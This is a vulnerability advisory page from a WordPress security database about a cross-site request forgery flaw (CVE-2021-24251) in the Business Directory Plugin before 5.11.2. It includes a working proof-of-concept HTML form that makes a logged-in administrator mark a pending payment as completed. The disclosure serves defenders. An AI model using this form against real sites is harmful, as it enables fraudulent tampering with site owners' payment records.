logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Business Directory Plugin < 5.11.2 - Arbitrary Payment History Update

Description

The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator update arbitrary payment history, such as change their status (from pending to completed to example)

Proof of Concept

Add a listing, don't complete payment (status will be pending)

<form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update">
<table>
<tbody><tr><td>
payment[created_at_date]</td><td><input name="payment[created_at_date]" value="2021-03-31" size="100"></td></tr>
<tr><td>
payment[created_at_time_hour]</td><td><input name="payment[created_at_time_hour]" value="17" size="100"></td></tr>
<tr><td>
payment[created_at_time_min]</td><td><input name="payment[created_at_time_min]" value="49" size="100"></td></tr>
<tr><td>
payment[id]</td><td><input name="payment[id]" value="3" size="100"></td></tr>
<tr><td>
payment[payer_data][address]</td><td><input name="payment[payer_data][address]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][address_2]</td><td><input name="payment[payer_data][address_2]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][city]</td><td><input name="payment[payer_data][city]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][country]</td><td><input name="payment[payer_data][country]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][state]</td><td><input name="payment[payer_data][state]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][zip]</td><td><input name="payment[payer_data][zip]" value="" size="100"></td></tr>
<tr><td>
payment[payer_email]</td><td><input name="payment[payer_email]" value="[email protected]" size="100"></td></tr>
<tr><td>
payment[payer_first_name]</td><td><input name="payment[payer_first_name]" value="" size="100"></td></tr>
<tr><td>
payment[payer_last_name]</td><td><input name="payment[payer_last_name]" value="" size="100"></td></tr>
<tr><td>
payment[status]</td><td><input name="payment[status]" value="completed" size="100"></td></tr>
<tr><td>
payment_note</td><td><input name="payment_note" value="" size="100"></td></tr>
</tbody></table>
<input id="submit" type="submit" value="Submit">
</form>

Affects Plugins

business-directory-plugin

Fixed in version 5.11.2

References

CVE

CVE-2021-24251

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Original Researcher

0xB9

Submitter

0xB9

Submitter twitter

0xB9sec

Verified

Yes

WPVDB ID

c9911236-4af3-4557-9bc0-217face534e1

Timeline

Publicly Published

2021-04-12 (about 9 months ago)

Added

2021-04-12 (about 9 months ago)

Last Updated

2021-04-14 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin